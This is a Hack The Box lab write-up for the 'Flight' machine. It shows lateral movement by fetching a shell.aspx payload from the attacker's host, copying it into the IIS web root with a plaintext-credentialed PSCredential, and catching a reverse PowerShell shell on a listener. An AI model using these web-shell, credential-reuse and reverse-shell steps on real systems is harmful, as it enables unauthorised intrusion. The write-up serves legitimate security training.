InfoSec LAB

Flight_Lateral_Movement_iis-default

Created: 2 min read

IIS AppPool\DefaultAppPool

Due to the complexity of the full account same, the IIS AppPool\DefaultAppPool account will be referred to as the iis-default account from here on out

Previously, ASPX code execution has been confirmed. In the following sections, I will attempt to make a lateral movement to the iis-default account by establishing a stable PowerShell session to the target system

ps c:\tmp> iwr -Uri http://10.10.16.8/shell.aspx -Outfile C:\tmp\shell.aspx

Transferring the payload to the target system over HTTP

ps c:\tmp> $Cred = New-Object System.Management.Automation.PSCredential("FLIGHT.HTB\c.bum", (ConvertTo-SecureString "Tikkycoll_431012284" -AsPlainText -Force)) ; Start-Process cmd.exe -Credential $Cred -ArgumentList "/c copy C:\tmp\shell.aspx C:\inetpub\development\"
         1 file(s) copied.

using the same technique of the powershell start-process cmdlet with the PSCredential object of the c.bum user, I can copy the payload to the C:\inetpub\development directory for the tunneled access.

┌──(kali㉿kali)-[~/archive/htb/labs/flight]
└─$ curl -s http://localhost:8000/shell.aspx

Invoking the payload

ps c:\tmp> iwr -Uri http://127.0.0.1:8000/shell.aspx

Or it could be invoked locally

┌──(kali㉿kali)-[~/archive/htb/labs/flight]
└─$ nnc 8888
listening on [any] 8888 ...
connect to [10.10.16.8] from (UNKNOWN) [10.10.11.187] 54063
Windows PowerShell running as user G0$ on G0
Copyright (C) Microsoft Corporation. All rights reserved.
 
 
ps c:\windows\system32\inetsrv> whoami
iis apppool\defaultapppool
ps c:\windows\system32\inetsrv> hostname
g0
ps c:\windows\system32\inetsrv> ipconfig
 
Windows IP Configuration
 
 
ethernet adapter ethernet0 2:
 
   connection-specific dns suffix  . : htb
   ipv6 address. . . . . . . . . . . : dead:beef::23d
   ipv6 address. . . . . . . . . . . : dead:beef::b1d9:efc7:61e1:4d02
   link-local ipv6 address . . . . . : fe80::b1d9:efc7:61e1:4d02%6
   ipv4 address. . . . . . . . . . . : 10.10.11.187
   subnet mask . . . . . . . . . . . : 255.255.254.0
   default gateway . . . . . . . . . : fe80::250:56ff:feb9:d784%6
                                       10.10.10.2

Lateral Movement made to the iis-default account

Interactive Graph View

Backlinks